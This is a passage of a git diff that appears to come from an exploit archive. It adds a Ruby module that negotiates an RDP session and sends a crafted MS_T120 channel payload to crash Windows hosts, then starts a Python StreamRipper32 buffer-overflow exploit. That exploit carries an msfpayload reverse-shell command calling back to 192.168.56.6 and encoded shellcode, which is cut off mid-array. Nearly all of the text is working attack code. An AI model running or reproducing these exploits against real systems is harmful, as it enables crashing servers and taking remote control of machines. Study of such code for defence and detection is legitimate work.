+ "\x01\xca" + # colorDepth: 8 bpp
+ "\x03\xaa" + # SASSequence: 43523
+ "\x09\x04\x00\x00" + # keyboardLayout: 1033 (English US)
+ "\xee\x42\x00\x00" + # clientBuild: ????
+ [name_unicode].pack("a*") + # clientName
+ "\x04\x00\x00\x00" + # keyboardType: 4 (IBMEnhanced 101 or 102)
+ "\x00\x00\x00\x00" + # keyboadSubtype: 0
+ "\x0c\x00\x00\x00" + # keyboardFunctionKey: 12
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + # imeFileName (64 bytes)
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+ "\x01\xca" + # postBeta2ColorDepth: 8 bpp
+ "\x01\x00" + # clientProductID: 1
+ "\x00\x00\x00\x00" + # serialNumber: 0
+ "\x18\x00" + # highColorDepth: 24 bpp
+ "\x0f\x00" + # supportedColorDepths: flag (24 bpp | 16 bpp | 15 bpp)
+ "\xaf\x07" + # earlyCapabilityFlags
+ "\x62\x00\x63\x00\x37\x00\x38\x00\x65\x00\x66\x00\x36\x00\x33\x00" + # clientDigProductID (64 bytes)
+ "\x2d\x00\x39\x00\x64\x00\x33\x00\x33\x00\x2d\x00\x34\x00\x31\x00" +
+ "\x39\x38\x00\x38\x00\x2d\x00\x39\x00\x32\x00\x63\x00\x66\x00\x2d" +
+ "\x00\x00\x31\x00\x62\x00\x32\x00\x64\x00\x61\x00\x42\x42\x42\x42" +
+ "\x07" + # connectionType: 7
+ "\x00" + # pad1octet
+
+ ## serverSelectedProtocol - After negotiating TLS or CredSSP this value
+ ## must match the selectedProtocol value from the server's Negotiate
+ ## Connection confirm PDU that was sent before encryption was started.
+ [selected_proto].pack('L<') + # "\x01\x00\x00\x00"
+
+ "\x56\x02\x00\x00" +
+ "\x50\x01\x00\x00" +
+ "\x00\x00" +
+ "\x64\x00\x00\x00" +
+ "\x64\x00\x00\x00" +
+
+ "\x04\xc0" + # clientClusterdata (TS_UD_CS_CLUSTER) header - 2.2.1.3.5
+ "\x0c\x00" + # Length: 12 (includes header)
+ "\x15\x00\x00\x00" + # flags (REDIRECTION_SUPPORTED | REDIRECTION_VERSION3)
+ "\x00\x00\x00\x00" + # RedirectedSessionID
+ "\x02\xc0" + # clientSecuritydata (TS_UD_CS_SEC) header - 2.2.1.3.3
+ "\x0c\x00" + # Length: 12 (includes header)
+ "\x1b\x00\x00\x00" + # encryptionMethods: 3 (40 bit | 128 bit)
+ "\x00\x00\x00\x00" + # extEncryptionMethods (French locale only)
+ "\x03\xc0" + # clientNetworkData (TS_UD_CS_NET) - 2.2.1.3.4
+ "\x38\x00" + # Length: 56 (includes header)
+ channels_defs
+
+ ## Fix. for packet modification.
+ ## T.125 Connect-Initial
+ size_1 = [pdu.length - 5].pack("s") # Length (BER: Length)
+ pdu[3] = size_1[1]
+ pdu[4] = size_1[0]
+
+ ## Connect-Initial: UserData
+ size_2 = [pdu.length - 102].pack("s") # UserData, length (BER: OctetString)
+ pdu[100] = size_2[1]
+ pdu[101] = size_2[0]
+
+ ## T.124 GCC Connection Data (ConnectData) - PER Encoding used
+ size_3 = [pdu.length - 111].pack("s") # Length (Connect PDU)
+ pdu[109] = "\x81"
+ pdu[110] = size_3[0]
+
+ size_4 = [pdu.length - 125].pack("s") # Length (T.124 UserData section)
+ pdu[123] = "\x81"
+ pdu[124] = size_4[0]
+
+ ## Client MCS Section - 2.2.1.3
+ size_5 = [pdu.length - 383].pack("s") # Length (includes header)
+ pdu[385] = size_5[0]
+
+ rdp_build_data_tpdu(pdu)
+ end
+
+ ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/9cde84cd-5055-475a-ac8b-704db419b66f
+ ## Client Security Exchange PDU - 2.2.1.10
+ def pdu_security_exchange(rcran, rsexp, rsmod, bitlen)
+ encrypted_rcran_bignum = rsa_encrypt(rcran, rsexp, rsmod)
+ encrypted_rcran = int_to_bytestring(encrypted_rcran_bignum)
+
+ bitlen += 8 # Pad with size of TS_SECURITY_PACKET header
+
+ userdata_length = 8 + bitlen
+ userdata_length_low = userdata_length & 0xFF
+ userdata_length_high = userdata_length / 256
+ flags = 0x80 | userdata_length_high
+
+ pdu = "\x64" + # T.125 sendDataRequest
+ "\x00\x08" + # intiator userId
+ "\x03\xeb" + # channelId = 1003
+ "\x70" + # dataPriority = high, segmentation = begin | end
+ [flags].pack("C") +
+ [userdata_length_low].pack("C") + # UserData length
+
+ # TS_SECURITY_PACKET - 2.2.1.10.1
+ "\x01\x00" + # securityHeader flags
+ "\x00\x00" + # securityHeader flagsHi
+ [bitlen].pack("L<") + # TS_ length
+ encrypted_rcran + # encryptedClientRandom - 64 bytes
+ "\x00\x00\x00\x00\x00\x00\x00\x00" # 8 bytes rear padding (always present)
+
+ return(rdp_build_data_tpdu(pdu))
+ end
+
+ ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/04c60697-0d9a-4afd-a0cd-2cc133151a9c
+ ## Client MCS Erect Domain Request PDU - 2.2.1.5
+ def pdu_erect_domain_request()
+ pdu = "\x04" + # T.125 ErectDomainRequest
+ "\x01\x00" + # subHeight - length 1, value 0
+ "\x01\x00" # subInterval - length 1, value 0
+
+ return(rdp_build_data_tpdu(pdu))
+ end
+
+ ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/f5d6a541-9b36-4100-b78f-18710f39f247\
+ ## Client MCS Attach User Request PDU - 2.2.1.6
+ def pdu_attach_user_request()
+ pdu = "\x28" # T.125 AttachUserRequest
+
+ return(rdp_build_data_tpdu(pdu))
+ end
+
+ ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/64564639-3b2d-4d2c-ae77-1105b4cc011b
+ ## Client MCS Channel Join Request PDU -2.2.1.8
+ def pdu_channel_request(user1, channel_id)
+ pdu = "\x38" + [user1, channel_id].pack("nn") # T.125 ChannelJoinRequest
+
+ return(rdp_build_data_tpdu(pdu))
+ end
+
+ ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/772d618e-b7d6-4cd0-b735-fa08af558f9d
+ ## TS_INFO_PACKET - 2.2.1.11.1.1
+ def pdu_client_info(user_name, domain_name = "", ip_address = "")
+ ## Max. len for 4.0/6.0 servers is 44 bytes including terminator.
+ ## Max. len for all other versions is 512 including terminator.
+ ## We're going to limit to 44 (21 chars + null -> unicode) here.
+
+ ## Blank username is valid, nil = random.
+ user_name = Rex::Text.rand_text_alpha(10) if user_name.nil?
+ user_unicode = Rex::Text.to_unicode(user_name[0..20], type = 'utf-16le')
+ uname_len = user_unicode.length
+
+ ## Domain can can be, and for rdesktop typically is, empty.
+ ## Max. len for 4.0/5.0 servers is 52 including terminator.
+ ## Max. len for all other versions is 512 including terminator.
+ ## We're going to limit to 52 (25 chars + null -> unicode) here.
+ domain_unicode = Rex::Text.to_unicode(domain_name[0..24], type = 'utf-16le')
+ domain_len = domain_unicode.length
+
+ ## This address value is primarily used to reduce the fields by which this
+ ## module can be fingerprinted. It doesn't show up in Windows logs.
+ ## clientAddress + null terminator
+ ip_unicode = Rex::Text.to_unicode(ip_address, type = 'utf-16le') + "\x00\x00"
+ ip_len = ip_unicode.length
+
+ pdu = "\xa1\xa5\x09\x04" +
+ "\x09\x04\xbb\x47" + # CodePage
+ "\x03\x00\x00\x00" + # flags - INFO_MOUSE, INFO_DISABLECTRLALTDEL, INFO_UNICODE, INFO_MAXIMIZESHELL, INFO_ENABLEWINDOWSKEY
+ [domain_len].pack("S<") + # cbDomain (length value) - EXCLUDES null terminator
+ [uname_len].pack("S<") + # cbUserName (length value) - EXCLUDES null terminator
+ "\x00\x00" + # cbPassword (length value)
+ "\x00\x00" + # cbAlternateShell (length value)
+ "\x00\x00" + # cbWorkingDir (length value)
+ [domain_unicode].pack("a*") + # Domain
+ "\x00\x00" + # Domain null terminator, EXCLUDED from value of cbDomain
+ [user_unicode].pack("a*") + # UserName
+ "\x00\x00" + # UserName null terminator, EXCLUDED FROM value of cbUserName
+ "\x00\x00" + # Password - empty
+ "\x00\x00" + # AlternateShell - empty
+
+ ## TS_EXTENDED_INFO_PACKET - 2.2.1.11.1.1.1
+ "\x02\x00" + # clientAddressFamily - AF_INET - FIXFIX - detect and set dynamically
+ [ip_len].pack("S<") + # cbClientAddress (length value) - INCLUDES terminator ... for reasons.
+ [ip_unicode].pack("a*") + # clientAddress (unicode + null terminator (unicode)
+
+ "\x3c\x00" + # cbClientDir (length value): 60
+ "\x43\x00\x3a\x00\x5c\x00\x57\x00\x49\x00\x4e\x00\x4e\x00\x54\x00" + # clientDir - 'C:\WINNT\System32\mstscax.dll' + null terminator
+ "\x5c\x00\x53\x00\x79\x00\x73\x00\x74\x00\x65\x00\x6d\x00\x33\x00" +
+ "\x32\x00\x5c\x00\x6d\x00\x73\x00\x74\x00\x73\x00\x63\x00\x61\x00" +
+ "\x78\x00\x2e\x00\x64\x00\x6c\x00\x6c\x00\x00\x00" +
+
+ ## clientTimeZone - TS_TIME_ZONE struct - 172 bytes
+ ## These are the default values for rdesktop
+ "\xa4\x01\x00\x00" + # Bias
+
+ ## StandardName - 'GTB,normaltid'
+ "\x4d\x00\x6f\x00\x75\x00\x6e\x00\x74\x00\x61\x00\x69\x00\x6e\x00" +
+ "\x20\x00\x53\x00\x74\x00\x61\x00\x6e\x00\x64\x00\x61\x00\x72\x00" +
+ "\x64\x00\x20\x00\x54\x00\x69\x00\x6d\x00\x65\x00\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+ "\x00\x00\x0b\x00\x00\x00\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00" + # StandardDate
+ "\x00\x00\x00\x00" + # StandardBias
+
+ ## DaylightName - 'GTB,sommartid'
+ "\x4d\x00\x6f\x00\x75\x00\x6e\x00\x74\x00\x61\x00\x69\x00\x6e\x00" +
+ "\x20\x00\x44\x00\x61\x00\x79\x00\x6c\x00\x69\x00\x67\x00\x68\x00" +
+ "\x74\x00\x20\x00\x54\x00\x69\x00\x6d\x00\x65\x00\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+ "\x00\x00\x03\x00\x00\x00\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00" + # DaylightDate
+ "\xc4\xff\xff\xff" + # DaylightBias
+
+ "\x01\x00\x00\x00" + # clientSessionId
+ "\x06\x00\x00\x00" + # performanceFlags
+ "\x00\x00" + # cbAutoReconnectCookie
+ "\x64\x00\x00\x00"
+
+ return(pdu)
+ end
+
+ # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/4e9722c3-ad83-43f5-af5a-529f73d88b48
+ # Confirm Active PDU Data - TS_CONFIRM_ACTIVE_PDU - 2.2.1.13.2.1
+ def pdu_client_confirm_active()
+ pdu = "\xea\x03\x01\x00" + # shareId: 66538
+ "\xea\x03" + # originatorId
+ "\x06\x00" + # lengthSourceDescriptor: 6
+ "\x3e\x02" + # lengthCombinedCapabilities: ???
+ "\x4d\x53\x54\x53\x43\x00" + # SourceDescriptor: 'MSTSC'
+ "\x17\x00" + # numberCapabilities: 23
+ "\x00\x00" + # pad2Octets
+ "\x01\x00" + # capabilitySetType: 1 - TS_GENERAL_CAPABILITYSET
+ "\x18\x00" + # lengthCapability: 24
+ "\x01\x00\x03\x00\x00\x02\x00\x00\x00\x00\x1d\x04\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00" +
+ "\x02\x00" + # capabilitySetType: 2 - TS_BITMAP_CAPABILITYSET
+ "\x1c\x00" + # lengthCapability: 28
+ "\x20\x00\x01\x00\x01\x00\x01\x00\x80\x07\x38\x04\x00\x00\x01\x00" +
+ "\x01\x00\x00\x1a\x01\x00\x00\x00" +
+ "\x03\x00" + # capabilitySetType: 3 - TS_ORDER_CAPABILITYSET
+ "\x58\x00" + # lengthCapability: 88
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00\x01\x00\x14\x00\x00\x00\x01\x00\x00\x00\xaa\x00" +
+ "\x01\x01\x01\x01\x01\x00\x00\x01\x01\x01\x00\x01\x00\x00\x00\x01" +
+ "\x01\x01\x01\x01\x01\x01\x01\x00\x01\x01\x01\x00\x00\x00\x00\x00" +
+ "\xa1\x06\x06\x00\x00\x00\x00\x00\x00\x84\x03\x00\x00\x00\x00\x00" +
+ "\xe4\x04\x00\x00\x13\x00\x28\x00\x03\x00\x00\x03\x78\x00\x00\x00" +
+ "\x78\x00\x00\x00\xfc\x09\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+ "\x0a\x00" + # capabilitySetType: 10 - ??
+ "\x08\x00" + # lengthCapability: 8
+ "\x06\x00\x00\x00" +
+ "\x07\x00" + # capabilitySetType: 7 - TSWINDOWACTIVATION_CAPABILITYSET
+ "\x0c\x00" + # lengthCapability: 12
+ "\x00\x00\x00\x00\x00\x00\x00\x00" +
+ "\x05\x00" + # capabilitySetType: 5 - TS_CONTROL_CAPABILITYSET
+ "\x0c\x00" + # lengthCapability: 12
+ "\x00\x00\x00\x00\x02\x00\x02\x00" +
+ "\x08\x00" + # capabilitySetType: 8 - TS_POINTER_CAPABILITYSET
+ "\x0a\x00" + # lengthCapability: 10
+ "\x01\x00\x14\x00\x15\x00" +
+ "\x09\x00" + # capabilitySetType: 9 - TS_SHARE_CAPABILITYSET
+ "\x08\x00" + # lengthCapability: 8
+ "\x00\x00\x00\x00" +
+ "\x0d\x00" + # capabilitySetType: 13 - TS_INPUT_CAPABILITYSET
+ "\x58\x00" + # lengthCapability: 88
+ "\x91\x00\x20\x00\x09\x04\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00" +
+ "\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
+ "\x00\x00\x00\x00" +
+ "\x0c\x00" + # capabilitySetType: 12 - TS_SOUND_CAPABILITYSET
+ "\x08\x00" + # lengthCapability: 8
+ "\x01\x00\x00\x00" +
+ "\x0e\x00" + # capabilitySetType: 14 - TS_FONT_CAPABILITYSET
+ "\x08\x00" + # lengthCapability: 8
+ "\x01\x00\x00\x00" +
+ "\x10\x00" + # capabilitySetType: 16 - TS_GLYPHCAChE_CAPABILITYSET
+ "\x34\x00" + # lengthCapability: 52
+ "\xfe\x00\x04\x00\xfe\x00\x04\x00\xfe\x00\x08\x00\xfe\x00\x08\x00" +
+ "\xfe\x00\x10\x00\xfe\x00\x20\x00\xfe\x00\x40\x00\xfe\x00\x80\x00" +
+ "\xfe\x00\x00\x01\x40\x00\x00\x08\x00\x01\x00\x01\x03\x00\x00\x00" +
+ "\x0f\x00" + # capabilitySetType: 15 - TS_BRUSH_CAPABILITYSET
+ "\x08\x00" + # lengthCapability: 8
+ "\x01\x00\x00\x00" +
+ "\x11\x00" + # capabilitySetType: ??
+ "\x0c\x00" + # lengthCapability: 12
+ "\x01\x00\x00\x00\x00\x28\x64\x00" +
+ "\x14\x00" + # capabilitySetType: ??
+ "\x0c\x00" + # lengthCapability: 12
+ "\x01\x00\x00\x00\x00\x00\x00\x00" +
+ "\x15\x00" + # capabilitySetType: ??
+ "\x0c\x00" + # lengthCapability: 12
+ "\x02\x00\x00\x00\x00\x0a\x00\x01" +
+ "\x1a\x00" + # capabilitySetType: ??
+ "\x08\x00" + # lengthCapability: 8
+ "\xaf\x94\x00\x00" +
+ "\x1c\x00" + # capabilitySetType: ??
+ "\x0c\x00" + # lengthCapability: 12
+ "\x12\x00\x00\x00\x00\x00\x00\x00" +
+ "\x1b\x00" + # capabilitySetType: ??
+ "\x06\x00" + # lengthCapability: 6
+ "\x01\x00" +
+ "\x1e\x00" + # capabilitySetType: ??
+ "\x08\x00" + # lengthCapability: 8
+ "\x01\x00\x00\x00" +
+ "\x18\x00" + # capabilitySetType: ??
+ "\x0b\x00" + # lengthCapability: 11
+ "\x02\x00\x00\x00\x03\x0c\x00" +
+ "\x1d\x00" + # capabilitySetType: ??
+ "\x5f\x00" + # lengthCapability: 95
+ "\x02\xb9\x1b\x8d\xca\x0f\x00\x4f\x15\x58\x9f\xae\x2d\x1a\x87\xe2" +
+ "\xd6\x01\x03\x00\x01\x01\x03\xd4\xcc\x44\x27\x8a\x9d\x74\x4e\x80" +
+ "\x3c\x0e\xcb\xee\xa1\x9c\x54\x05\x31\x00\x31\x00\x00\x00\x01\x00" +
+ "\x00\x00\x25\x00\x00\x00\xc0\xcb\x08\x00\x00\x00\x01\x00\xc1\xcb" +
+ "\x1d\x00\x00\x00\x01\xc0\xcf\x02\x00\x08\x00\x00\x01\x40\x00\x02" +
+ "\x01\x01\x01\x00\x01\x40\x00\x02\x01\x01\x04"
+
+ ## type = 0x13 = TS_PROTOCOL_VERSION | PDUTYPE_CONFIRMACTIVEPDU
+ return(rdp_build_share_control_header(0x13, pdu))
+ end
+
+ ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/5186005a-36f5-4f5d-8c06-968f28e2d992
+ ## Client Synchronize - TS_SYNCHRONIZE_PDU - 2.2.1.19 / 2.2.14.1
+ def pdu_client_synchronize(target_user = 0)
+ pdu = "\x01\x00" + # messageType: 1 SYNCMSGTYPE_SYNC
+ [target_user].pack("S<") # targetUser, 16 bit, unsigned.
+
+ ## pduType2 = 0x1f = 31 - PDUTYPE2_SCYNCHRONIZE
+ data_header = rdp_build_share_data_header(0x1f, pdu)
+
+ ## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
+ return(rdp_build_share_control_header(0x17, data_header))
+ end
+
+ ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/9d1e1e21-d8b4-4bfd-9caf-4b72ee91a7135
+ ## Control Cooperate - TC_CONTROL_PDU 2.2.1.15
+ def pdu_client_control_cooperate()
+ pdu = "\x04\x00" + # action: 4 - CTRLACTION_COOPERATE
+ "\x00\x00" + # grantId: 0
+ "\x00\x00\x00\x00" # controlId: 0
+
+ ## pduType2 = 0x14 = 20 - PDUTYPE2_CONTROL
+ data_header = rdp_build_share_data_header(0x14, pdu)
+
+ ## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
+ return(rdp_build_share_control_header(0x17, data_header))
+ end
+
+
+ ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/4f94e123-970b-4242-8cf6-39820d8e3d35
+ ## Control Request - TC_CONTROL_PDU 2.2.1.16
+ def pdu_client_control_request()
+
+ pdu = "\x01\x00" + # action: 1 - CTRLACTION_REQUEST_CONTROL
+ "\x00\x00" + # grantId: 0
+ "\x00\x00\x00\x00" # controlId: 0
+
+ ## pduType2 = 0x14 = 20 - PDUTYPE2_CONTROL
+ data_header = rdp_build_share_data_header(0x14, pdu)
+
+ ## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
+ return(rdp_build_share_control_header(0x17, data_header))
+ end
+
+ ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/ff7f06f8-0dcf-4c8d-be1f-596ae60c4396
+ ## Client Input Event Data - TS_INPUT_PDU_DATA - 2.2.8.1.1.3.1
+ def pdu_client_input_event_sychronize()
+ pdu = "\x01\x00" + # numEvents: 1
+ "\x00\x00" + # pad2Octets
+ "\x00\x00\x00\x00" + # eventTime
+ "\x00\x00" + # messageType: 0 - INPUT_EVENT_SYNC
+
+ ## TS_SYNC_EVENT 202.8.1.1.3.1.1.5
+ "\x00\x00" + # pad2Octets
+ "\x00\x00\x00\x00" # toggleFlags
+
+ ## pduType2 = 0x1c = 28 - PDUTYPE2_INPUT
+ data_header = rdp_build_share_data_header(0x1c, pdu)
+
+ ## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
+ return(rdp_build_share_control_header(0x17, data_header))
+ end
+
+ ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/7067da0d-e318-4464-88e8-b11509cf0bd9
+ ## Client Font List - TS_FONT_LIST_PDU - 2.2.1.18
+ def pdu_client_font_list()
+ pdu = "\x00\x00" + # numberFonts: 0
+ "\x00\x00" + # totalNumberFonts: 0
+ "\x03\x00" + # listFlags: 3 (FONTLIST_FIRST | FONTLIST_LAST)
+ "\x32\x00" # entrySize: 50
+
+ ## pduType2 = 0x27 = 29 - PDUTYPE2_FONTLIST
+ data_header = rdp_build_share_data_header(0x27, pdu)
+
+ ## type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
+ return(rdp_build_share_control_header(0x17, data_header))
+ end
+
+ # ------------------------------------------------------------------------- #
+
+ def crash_test(rc4enckey, hmackey)
+ begin
+ received = ""
+ for i in 0..5
+ received += rdp_recv()
+ end
+ rescue RdpCommunicationError
+ # we don't care
+ end
+
+ vprint_status("Sending DoS payload")
+ found = false
+ for j in 0..15
+ ## x86_payload:
+ rdp_send(rdp_build_pkt(rdp_build_virtual_channel_pdu(0x03, ["00000000020000000000000"].pack("H*")), rc4enckey, hmackey, "\x03\xef"))
+
+ ## x64_payload:
+ rdp_send(rdp_build_pkt(rdp_build_virtual_channel_pdu(0x03, ["00000000000000000200000"].pack("H*")), rc4enckey, hmackey, "\x03\xef"))
+ end
+ end
+
+ def produce_dos()
+
+ unless(rdp_connection_initiation())
+ vprint_status("Could not connect to RDP.")
+ return(false)
+ end
+
+ vprint_status("Sending initial client data")
+ received = rdp_sendrecv(pdu_connect_initial(RDPConstants::PROTOCOL_RDP, datastore['RDP_CLIENT_NAME']))
+
+ rsmod, rsexp, rsran, server_rand, bitlen = rdp_parse_connect_response(received)
+
+ vprint_status("Sending erect domain request")
+ rdp_send(pdu_erect_domain_request())
+
+ vprint_status("Sending attach user request")
+ received = rdp_sendrecv(pdu_attach_user_request())
+
+ user1 = received[9, 2].unpack("n").first
+
+ [1003, 1004, 1005, 1006, 1007].each do | chan |
+ rdp_sendrecv(pdu_channel_request(user1, chan))
+ end
+
+ ## 5.3.4 Client Random Value
+ client_rand = ''
+ 32.times { client_rand << rand(0..255) }
+ rcran = bytes_to_bignum(client_rand)
+
+ vprint_status("Sending security exchange PDU")
+ rdp_send(pdu_security_exchange(rcran, rsexp, rsmod, bitlen))
+
+ ## We aren't decrypting anything at this point. Leave the variables here
+ ## to make it easier to understand in the future.
+ rc4encstart, rc4decstart, hmackey, sessblob = rdp_calculate_rc4_keys(client_rand, server_rand)
+
+ vprint_status("RC4_ENC_KEY: #{bin_to_hex(rc4encstart)}")
+ vprint_status("RC4_DEC_KEY: #{bin_to_hex(rc4decstart)}")
+ vprint_status("HMAC_KEY: #{bin_to_hex(hmackey)}")
+ vprint_status("SESS_BLOB: #{bin_to_hex(sessblob)}")
+
+ rc4enckey = RC4.new(rc4encstart)
+
+ vprint_status("Sending client info PDU") # TODO
+ pdu = pdu_client_info(datastore['RDP_USER'], datastore['RDP_DOMAIN'], datastore['RDP_CLIENT_IP'])
+ received = rdp_sendrecv(rdp_build_pkt(pdu, rc4enckey, hmackey, "\x03\xeb", true))
+
+ vprint_status("Received License packet")
+ rdp_recv()
+
+ vprint_status("Sending client confirm active PDU")
+ rdp_send(rdp_build_pkt(pdu_client_confirm_active(), rc4enckey, hmackey))
+
+ vprint_status("Sending client synchronize PDU")
+ rdp_send(rdp_build_pkt(pdu_client_synchronize(1009), rc4enckey, hmackey))
+
+ vprint_status("Sending client control cooperate PDU")
+ rdp_send(rdp_build_pkt(pdu_client_control_cooperate(), rc4enckey, hmackey))
+
+ vprint_status("Sending client control request control PDU")
+ rdp_send(rdp_build_pkt(pdu_client_control_request(), rc4enckey, hmackey))
+
+ vprint_status("Sending client input sychronize PDU")
+ rdp_send(rdp_build_pkt(pdu_client_input_event_sychronize(), rc4enckey, hmackey))
+
+ vprint_status("Sending client font list PDU")
+ rdp_send(rdp_build_pkt(pdu_client_font_list(), rc4enckey, hmackey))
+
+ vprint_status("Sending close mst120 PDU")
+ crash_test(rc4enckey, hmackey)
+
+ vprint_status("Sending client disconnection PDU")
+ rdp_send(rdp_build_data_tpdu("\x21\x80"))
+
+ return(true)
+ end
+
+ # ------------------------------------------------------------------------- #
+
+ def run_host(ip)
+ ## Allow the run command to call the check command.
+ begin
+ if(open_connection())
+ status = produce_dos()
+ end
+ rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError, ::TypeError => e
+ bt = e.backtrace.join("\n")
+ vprint_error("Unexpected error: #{e.message}")
+ vprint_line(bt)
+ elog("#{e.message}\n#{bt}")
+ rescue RdpCommunicationError => e
+ vprint_error("Error communicating RDP protocol.")
+ status = Exploit::CheckCode::Unknown
+ rescue Errno::ECONNRESET => e # NLA?
+ vprint_error("Connection reset, possible NLA is enabled.")
+ rescue => e
+ bt = e.backtrace.join("\n")
+ vprint_error("Unexpected error: #{e.message}")
+ vprint_line(bt)
+ elog("#{e.message}\n#{bt}")
+ ensure
+
+ if(status == true)
+ sleep(1)
+ unless(open_connection())
+ print_good("The host is crashed!")
+ else
+ print_bad("The DoS has been sent but the host is already connected!")
+ end
+ end
+
+ disconnect()
+ end
+ end
+
+end
\ No newline at end of file
diff --git a/exploits/windows/local/47116.py b/exploits/windows/local/47116.py
new file mode 100755
index 000000000..f6cb7aba3
--- /dev/null
+++ b/exploits/windows/local/47116.py
@@ -0,0 +1,70 @@
+#!/usr/bin/python
+
+#Exploit Title: StreamRipper32 Buffer Overflow
+#Date: 07/2019
+#Exploit Author: Andrey Stoykov (OSCP)
+#Tested On: Win7 SP1 x64
+#Software Link: http://streamripper.sourceforge.net/sr32/StreamRipper32_2_6.exe
+#Version: 2.6
+#Steps To Reproduce: Double click on "Add" in the "Station/Song Section" and paste the output in "Song Pattern"
+
+file = open('exploit.txt', 'wb')
+
+#msfpayload windows/shell_reverse_tcp LHOST=192.168.56.6 EXITFUNC=thread LPORT=4444 R | msfencode -e x86/alpha_mixed -b "\x00\x0a\x0d\xb4\xb8\xbc\xbd\xbe" -f c
+
+shellcode = ("\xdb\xd7\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49\x49" +
+"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" +
+"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42" +
+"\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75" +
+"\x4a\x49\x39\x6c\x48\x68\x4b\x39\x53\x30\x65\x50\x63\x30" +
+"\x45\x30\x4f\x79\x6b\x55\x64\x71\x4b\x62\x42\x44\x4e\x6b" +
+"\x50\x52\x44\x70\x4e\x6b\x61\x42\x76\x6c\x4e\x6b\x61\x42" +
+"\x52\x34\x6c\x4b\x54\x32\x46\x48\x56\x6f\x6e\x57\x70\x4a" +
+"\x37\x56\x35\x61\x79\x6f\x56\x51\x4f\x30\x4c\x6c\x57\x4c" +
+"\x31\x71\x71\x6c\x46\x62\x46\x4c\x77\x50\x6f\x31\x38\x4f" +
+"\x66\x6d\x73\x31\x6b\x77\x79\x72\x78\x70\x66\x32\x33\x67" +
+"\x6e\x6b\x43\x62\x34\x50\x4c\x4b\x43\x72\x75\x6c\x57\x71" +
+"\x5a\x70\x6c\x4b\x61\x50\x30\x78\x6f\x75\x39\x50\x32\x54" +
+"\x63\x7a\x36\x61\x4a\x70\x36\x30\x4c\x4b\x51\x58\x34\x58" +
+"\x4c\x4b\x76\x38\x75\x70\x53\x31\x5a\x73\x79\x73\x35\x6c" +
+"\x32\x69\x6e\x6b\x66\x54\x4e\x6b\x56\x61\x49\x46\x35\x61" +
+"\x49\x6f\x74\x71\x6b\x70\x4c\x6c\x49\x51\x7a\x6f\x64\x4d" +
+"\x55\x51\x79\x57\x54\x78\x49\x70\x32\x55\x58\x74\x44\x43" +
+"\x73\x4d\x4b\x48\x55\x6b\x33\x4d\x76\x44\x33\x45\x6b\x52" +
+"\x66\x38\x6c\x4b\x53\x68\x44\x64\x35\x51\x38\x53\x73\x56" +
+"\x4c\x4b\x54\x4c\x70\x4b\x4c\x4b\x32\x78\x77\x6c\x35\x51" +
+"\x5a\x73\x6e\x6b\x65\x54\x4c\x4b\x76\x61\x7a\x70\x4e\x69" +
+"\x30\x44\x44\x64\x61\x34\x71\x4b\x73\x6b\x53\x51\x61\x49" +
+"\x62\x7a\x42\x71\x4b\x4f\x59\x70\x52\x78\x53\x6f\x62\x7a" +
+"\x6c\x4b\x57\x62\x4a\x4b\x4f\x76\x73\x6d\x51\x78\x74\x73" +
+"\x36\x52\x37\x70\x45\x50\x52\x48\x64\x37\x31\x63\x35\x62" +
+"\x33\x6f\x33\x64\x43\x58\x62\x6c\x33\x47\x36\x46\x37\x77" +
